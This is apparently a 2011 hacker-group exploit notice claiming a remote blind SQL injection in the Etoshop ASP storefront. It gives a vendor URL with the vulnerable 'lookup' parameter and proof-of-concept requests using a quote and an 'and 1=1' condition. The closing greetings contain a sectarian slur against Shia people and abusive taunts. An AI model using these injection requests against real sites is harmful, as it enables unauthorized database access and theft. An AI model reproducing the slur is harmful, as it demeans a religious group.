Etoshop Blind SQL Injection

`  
  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-   
[~] Tybe: SuFFEr Fr0M remote BLIND SqL injection   
[~] Vendor: http://www.etoshop.com  
[+] Software: Etoshop   
[+] Platforms: ASP   
[~] author: R3d-D3v!L  
[+] TEAM: ......  
[~]   
[?] contact: X[at]hotmail.co.jp   
[-]   
[?] Date: i6.jul.2oll   
[?] T!ME: 011:33 pm GMT   
[?] Home: .........   
[^]   
  
[?]   
======================================================================================   
#suFFEr Fr0M remote SqL iNJECT!ON  
======================================================================================   
  
[*] Err0r C0N50L3:   
  
  
http://www.etoshop.com/etoshop/lprod.asp?lookup=422 <---- vulun  
  
[*] prove of concept =   
  
http://www.etoshop.com/etoshop/lprod.asp?lookup=422' <----false  
  
http://www.etoshop.com/etoshop/lprod.asp?lookup=422%20and%201=1 <---- TRuE  
  
  
[~]-----------------------------{((TRYAG))}------------------------------------------------   
# ;   
# ;   
[~] Greetz tO: ....................................................................  
#   
[~]70 ALL ARAB!AN HACKER 3X3PT : .....the fucken for all she3a and 7eaders lions bitches ......#   
#   
[X] (/) GET your security FUckEN DOWN ((R3d_D3VV!L)) !S HERE (\)   
#  
[~] spechial thanks :.............................. # ;   
#   
[?]spechial SupP0RT : MY M!ND #  
#   
[?]---> ((R3d D3v!L<---R00T-L0RD-->JUPA<---aNd--->Devil ro0t)) #;   
#   
[~]spechial FR!ND: ........................................#;   
#   
[~] !'M 4R48!4N 3XPL0!73R. #;   
#   
[~](>D!R 4ll 0R D!E<) #;   
#   
[~]---------------------------------------------------------------------------------------------  
  
`